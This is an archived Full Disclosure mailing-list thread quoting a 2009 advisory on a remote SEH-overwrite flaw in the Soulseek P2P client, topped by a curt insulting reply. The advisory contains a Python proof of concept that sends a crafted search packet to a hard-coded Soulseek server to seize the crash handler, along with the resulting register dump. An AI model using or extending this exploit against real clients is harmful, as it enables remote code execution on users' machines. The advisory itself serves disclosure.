Full Disclosure mailing list archives
Re: Soulseek * P2P Remote Distributed Search CodeExecution
From: "Anders Klixbull" <akl () experian dk>
Date: Mon, 8 Jun 2009 15:01:30 +0200
go suck a lemon ________________________________ From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Pete Licoln Sent: 5. juni 2009 08:02 To: laurent gaffie; full-disclosure Subject: Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search CodeExecution Seems like you have a problem with responsible disclosure Kid ; Do you have any familly relationship with jeremy Brown ? ;P http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments 2009/5/25 Pete Licoln <pete.licoln () gmail com> Oh so you have a blog ... http://g-laurent.blogspot.com/ 2009/5/25 laurent gaffie <laurent.gaffie () gmail com> ============================================= - Release date: May 24th, 2009 - Discovered by: Laurent GaffiƩ - Severity: critical ============================================= I. VULNERABILITY ------------------------- Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution II. BACKGROUND ------------------------- "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!" III. DESCRIPTION ------------------------- Soulseek client allows distributed file search to one person, everyone, or in a specific Soulseek IRC channel, allowing a user to find the files he wants, in a dedicated channel, or with his contacts, or on the whole network. Unfortunatly this feature is vulnerable to a remote SEH overwrite to a specific user, or even to a whole Soulseek IRC channel. IV. PROOF OF CONCEPT ------------------------- This proof of concept is made to prevent a S-K party, it is only build to target the user "testt4321". To try this proof of concept, you would have to open a soulseek client and use the username: "testt4321" with the password: "12345678" And launch this code. If you want to change the username or target a whole channel, you would have to reverse the binary protocol #!/usr/bin/python import struct import sys, socket from time import * s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74" buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38" buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30" buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35" buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00" s.send(buffer) sleep(1) junk = "\x41" * 3084 next_seh = struct.pack('<L', 0x42424242) seh = struct.pack('<L', 0x43434343) other_junk = "\x61" * 1423 buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74" buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk s.send(buffer2) sleep(1) s.recv(1024) After the query is send, the memory will look like this 0012FBE4 41414141 0012FBE8 42424242 Pointer to next SEH record 0012FBEC 43434343 SE handler 0012FBF0 61616161 And the program will terminate with this structure: EAX 00000000 ECX 43434343 EDX 7C9132BC ntdll.7C9132BC EBX 00000000 ESP 0012EA78 EBP 0012EA98 ESI 00000000 EDI 00000000 EIP 43434343 V. BUSINESS IMPACT ------------------------- An attacker could exploit this vulnerability to compromise any Soulseek client connected to the Soulseek network. VI. SYSTEMS AFFECTED ------------------------- Windows all versions running Soulseek * VII. SOLUTION ------------------------- A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/) a Python Soulseek client. Another quick workaround (at server level) would be to limit the search query lenght. VIII. REFERENCES ------------------------- http://www.slsknet.org <http://www.slsknet.org/> IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent GaffiƩ Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com/> X. REVISION HISTORY ------------------------- May 24, 2009: Initial release XI. DISCLOSURE TIMELINE ------------------------- july 29, 2008: Bug discovered September 03, 2008: Vendor contacted; no response. October 14, 2008: Vendor contacted; still no response. April 12, 2009: Idefense contacted. April 13, 2009: Idefense answered. April 23, 2009: Advisory send to idefense contributor program. May 13, 2009: Idefense contacted, bug rejected (no reason given) May 15, 2009: Idefense recontacted; no answer. May 16, 2009: Last try to contact Soulseek maintainers May 24, 2009: Advisory published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Soulseek * P2P Remote Distributed Search Code Execution Pete Licoln (Jun 04)
- Re: Soulseek * P2P Remote Distributed Search Code Execution laurent gaffie (Jun 04)
- Re: Soulseek * P2P Remote Distributed Search CodeExecution Anders Klixbull (Jun 08)